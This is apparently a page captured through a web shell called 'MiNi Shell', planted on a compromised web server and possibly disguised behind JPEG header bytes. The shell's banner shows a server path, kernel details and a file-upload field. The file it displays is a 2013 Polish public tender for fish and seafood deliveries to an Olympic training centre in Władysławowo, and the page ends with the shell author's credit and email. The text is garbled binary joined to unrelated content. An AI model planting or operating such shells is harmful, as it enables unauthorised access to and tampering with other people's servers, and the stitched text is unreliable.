JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131001/397676-N-2013.html

<p class="kh_header"><b>Władysławowo: Sukcesywne dostawy  ryb,  przetworów rybnych i owoców morza wraz z usługą transportu</b><br>
<b>Numer ogłoszenia: 397676 - 2013; data zamieszczenia: 01.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy  ryb,  przetworów rybnych i owoców morza wraz z usługą transportu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy dostawy  ryb,  przetworów rybnych i owoców morza wraz z usługą transportu przez okres 3 miesięcy  do Ośrodka Przygotowań Olimpijskich we Władysławowie. Wartość szacunkowa zamówienia nie przekracza
kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r.Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907) - tekst jednolity.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2, 15.22.00.00-6, 15.23.40.00-7, 15.24.30.00-3, 15.25.00.00-5, 63.20.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jeżeli z upływem 3  miesięcy od dnia podpisania niniejszej umowy kwota określona w ust. 1 zawartej umowy pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
2.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego do zmian ilości (według zamówień częściowych). 
3.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny (bez zmiany ceny jednostkowej) w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji oraz zgoda Zamawiającego na przedstawiony przez Wykonawcę produkt równoważny</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2013 godzina 10:00, miejsce: Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo :SEKRETARIAT (budynek krytej pływalni).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> RYBY MROŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części I są sukcesywne dostawy  ryb mrożonych w zakresie: 1.	SOLA FILET - limanda żółtopłetwa kg	200
2.	DORSZ FILET - Bałtycki kg	250
3.	SANDACZ FILET kg	15
4.	MINTAJ FILET 	kg	50
5.	FLĄDRA FILET kg	220
6.	MORSZCZUK FILET 	kg	20
7.	PANGA FILET kg	150
8.	TILAPIA FILET kg	150
9.	ŁOSOŚ FILET - kg	170
10.	HALIBUT FILET kg	20
11.	HALIBUT TUSZA 	kg	20
12.	PSTRĄG FILET (kg	120
13.	DORSZ MIELONKA (biała klasy A)	kg	30
14.	NOTOTENIA TUSZA IQF kg	50
15.	KARGULENA - 	kg	20
16.	TUŃCZYK POLĘDWICA kg	5
17.	TUŃCZYK POLĘDWICA kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2, 15.22.00.00-6, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby Świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części II są sukcesywne dostawy ryb świeżych w zakresie: 1.	FILET Z DORSZA  BAŁTYCKIEGO (ze skórą - świeży, kl. I, najlepszej jakości ) 	kg	250
2.	FLĄDRA TUSZA ( świeża, kl I, najlepsza jakość)	kg	20
3.	FILET Z ŁOSOSIA NORWESKIEGO ( ze skórą świeży, kl. I, najlepszej jakości, 1 filet o wadze min 1 kg, trymowany bez ości )	kg	300
4.	FILET Z PSTRĄGA (świeży, ze skórą, najlepszej jakości )	kg	150
5.	PSTRĄG ŚWIEŻY (świeży, ze skórą, najlepszej jakości )	kg	20
6.	ŁOSOŚ NORWESKI W CAŁOŚCI - świeży, waga 5-6 kg, klasa I, najlepsza jakość.	kg	10
7.	KARP ŚWIEŻY W CAŁOŚCI (świeży, waga 1-2 kg, klasa I, najlepsza jakość)	kg	10
8.	KARP ŚWIEŻY FILET (świeży, klasa I, najlepsza jakość)	kg	5
9.	PŁATY ŚLEDZIOWE (świeże, klasa I, najlepsza jakość)	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Owoce morza i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części III są sukcesywne dostawy owoców morza i innych w zakresie: 1.	RAKI (cały, mrożony, czerwony, opakowanie 1 kg, kl I )	kg	2
2.	SZYJKI RAKOWE - ( ogotowane, oczyszczone, opakowanie max 1 kg)	kg	2,5
3.	KREWETKI KOKTAJLOWE 100/200 (ogony obrane, surowe mrożone, kl I opakowanie 1 kg)	kg	5
4.	KREWETKI OGONY 16/20 ( ogony obrane, surowe mrożone, kl I opakowanie 1 kg)	kg	5
5.	KREWETKI OGONY 16/20 ( ogony obrane, obgotowane mrożone, kl I opakowanie 1 kg)	kg	5
6.	KREWETKI BLACK TIGER 16/20 ( całe z głową, mrożone, kl I opakowanie 1 kg)	kg	5
7.	KREWETKI BLACK TIGER 31/40 ( całe z głową, mrożone, kl I opakowanie 1 kg)	kg	5
8.	PALUSZKI KRABOWE (surmii mrożone , kl I)	kg	5
9.	OŚMIORNICZKI BABE (surowe mrożone, oczyszczone, 20-50g)	kg	3
10.	MAŁŻE NOWOZELANDZKIE N/Z (obgotowane mrożone, połówki oczyszczone, opakowanie 1 kg)	kg	3
11.	MULE CAŁE ( surowe mrożone, całe oczyszczone, opakowanie 1 kg)	kg	5
12.	MIESO MULI (obgotowane, opakowanie 1 kg, kl 1)	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.25.00.00-5, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ryby wędzone i marynowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części IV są sukcesywne dostawy ryb wędzonych i marynowanych w zakresie: 1.	ŁOSOŚ NORWESKI  ( wędzony na zimno, płat, świeży, najlepszej jakości )	kg	15
2.	ŁOSOŚ NORWESKI  ( wędzony na zimno , krojony w plastry , świeży, najlepszej jakości )	kg	10
3.	ŁOSOŚ NORWESKI STEK ( wędzony na ciepło, świeży, najlepszej jakości )	kg	8
4.	PŁAT Z MAKRELI ( wędzony na ciepło, świeży, kl I, najlepsza jakość )	kg	20
5.	MAKRELA WĘDZONA CAŁA ( wędzona na ciepło, świeży, kl I, najlepsza jakość)	kg	60
6.	SZPROT WĘDZONY ( wędzony na ciepło, świeży, kl I, najlepsza jakość)	kg	10
7.	ŚLEDŹ WĘDZONY PŁAT ( wędzony na zimno, świeży, kl I, najlepsza jakość)	kg	15
8.	HALIBUT WĘDZONY (wędzony na ciepło, świeży, kI 1, najlepsza jakość )	kg	10
9.	WĘGORZ  ( wędzony, kl. I, najlepszej jakości )	kg	10
10.	PSTRĄG WĘDZONY w całości  (wędzony na zimno, klasa I ) 	kg	10
11.	TILAPIA WĘDZONA FILET (wędzona na zimno, klasa I ) 	kg	15
12.	TUŃCZYK POLĘDWICA - wędzona na zimno, klasa I, najwyższa jakość.	kg	10
13.	MAŚLANA POLĘDWICA - wędzona na zimno, klasa I, najwyższa jakość.	kg	10
14.	SALSA KRAJANKA ŚLEDZIOWA  (Krajanka śledziowa z dodatkiem papryki)	kg	25
15.	KRAJANKA ŚLEDZIOWA ŻYDOWSKA  (Krajanka śledziowa z dodatkiem ziół)	kg	25
16.	SAŁATKA KRABOWA  (Sałatka z paluszków surimi z dodatkiem majonezu)	kg	10
17.	ROLMOPSY KASZUBSKIE  (marynowane w oleju z marynowaną cebulą)	kg	25
18.	ROLMOPSY W OCCIE  (marynowane w occie z cebulą i ogórkiem)	kg	25
19.	KORECZKI ŚLEDZIOWE Z PAPRYKĄ  (marynowane w oleju z marynowaną cebulą i ogórkiem)	kg	25
20.	FILETY ŚLEDZIOWE MARYNOWANE - w occie kl. I, najlepszej jakości                                              	kg	10
21.	FILETY ŚLEDZIOWE SOLONE - w zalewie solnej kl. I, najlepszej jakości                                              	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.23.40.00-7, 15.24.30.00-3, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com